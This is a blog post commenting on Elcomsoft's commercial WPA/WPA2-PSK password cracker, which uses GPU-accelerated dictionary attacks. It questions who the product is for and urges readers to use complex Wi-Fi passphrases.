For sale: Wi-Fi encryption cracker

A Russian company Elcomsoft is now selling software that tests the strength of WPA and WPA2 PSK passwords. No need to panic. Still we need to look at the motive and possible future repercussions caused by this.

Elcomsoft is selling Wireless Security Auditor, a WPA/WPA2 encryption cracker for PSK passphrases. I'm not that worried because it's an expensive endeavor and it has limited usefulness. Let's take a look at three reasons why I say that:

  • Prove RoI--The application costs more than $600 US.
  • Unique hardware -- A custom high-end PC with three or four graphics cards is required. (I'll explain why later.)
  • PSK requirement -- The application uses a process called dictionary attack, which is only effective if simple PSK passphrases are used.

The first two would be show stoppers for most of us, but Elcomsoft isn't targeting us. They feel this product will be beneficial to larger corporations that are employing wireless networks, as mentioned on their Web site:

"A single weak link poses a valid security threat to the entire corporate network. Wireless (Wi-Fi) networks can provide sufficient security if configured properly and accompanied by an adequate password policy. Elcomsoft Wireless Security Auditor exposes security problems in your wireless network to allow network administrators taking appropriate measures and adopting a proper password policy."

Where's the logic?

I'm having a difficult time understanding Elcomsoft's rational for selling this product. I'm sorry, but the cynic in me sees only two possible explanations: Either Elcomsoft doesn't understand the corporate wireless environment, or Elcomsoft wants to dissolve itself of any responsibility if the product is used illegally. See if my logic makes sense to you.


If corporate entities are concerned about security, they will be running 802.11i supplemented with components of 802.1X and not use PSK passphrases. Furthermore having to set up each individual computer with the same PSK passphrase is not very efficient if there are hundreds of workstations. So most corporations with wireless networks will not need Wireless Security Auditor to check for weak encryption policies.

Small businesses?

If large corporations don't need Wireless Security Auditor, then who does? Small businesses or SOHO operations that aren't using 802.11i/802.1X for authentication might need it, but I doubt it. It's been my experience that small businesses are even more sensitive to RoI. Especially with the "current economic climate," most small business owners are not inclined to spend money on what they consider reactive solutions that hurt the bottom line.

So, who then?

I'm not really sure. The individual or organization that would like an application like this already have it or are sophisticated enough to figure it out on their own. This exploit isn't new, as can be seen by the Robert Moskowitz article "Weakness in Passphrase Choice in WPA Interface," which was published in November of 2003.

One reason to buy

I must admit that Elcomsoft has all but eliminated the main drawback of dictionary attacks. Normally it would take so much time to complete a dictionary attack, that only the most determined attackers would be willing to use it. It was quite ingenious of Elcomsoft to harness the processing power of multiple high-end graphics cards. Elcomsoft has even applied for a patent on what they call GPU acceleration:

"ElcomSoft has pioneered many software innovations that have made it easier to recover passwords protecting various types of resources. For the first time in the industry, the company's patent-pending GPU acceleration makes its way into Wi-Fi password recovery, reducing the time required to recover Wi-Fi passwords up to a hundred times. Supporting up to four NVIDIA boards such as GeForce 8, 9, and 200, as well as ATI video cards such as RADEON HD 3000 Series and up, Elcomsoft Wireless Security Auditor allows building servers with supercomputer performance at a fraction of the price."

What now?

Now that we understand what's available, I'd like to share my concerns. It's obvious that if something like this fell into the wrong hands it could cause a lot of hardship. I realize the cost is prohibitive for most, but we have to take underground trafficking of software into consideration. How long before Wireless Security Auditor is made available on a BitTorrent channel?

Once that happens I start to worry about unsuspecting consumers who are using simple passwords or even the default password that came with the Wi-Fi equipment. I can hear their arguments now:

"You told me that my Wi-Fi system would be secure if I used WPA/WPA2. So I went through all that trouble upgrading and now you are telling me that I have to come up with a complicated passphrase that's hard to remember."

Sound familiar? I even get frustrated, but there's precious little we can do other than to continue to be vigilant and help each other.

Final thoughts

I don't want it to seem like I'm crying wolf, because there's no need to be overly concerned. Please just ensure that your Wi-Fi passphrases are complicated, making this attack vector useless. In my next article, I'm going to discuss some options that can simplify the whole process of using complicated passphrases. I'd also like to hear about any tips that you have in that regard as well.

Need help keeping systems connected and running at high efficiency? Delivered Monday and Wednesday, TechRepublic's Network Administrator newsletter has the tips and tricks you need to better configure, support, and optimize your network. Automatically sign up today!


Information is my field...Writing is my passion...Coupling the two is my mission.

Editor's Picks

Free Newsletters, In your Inbox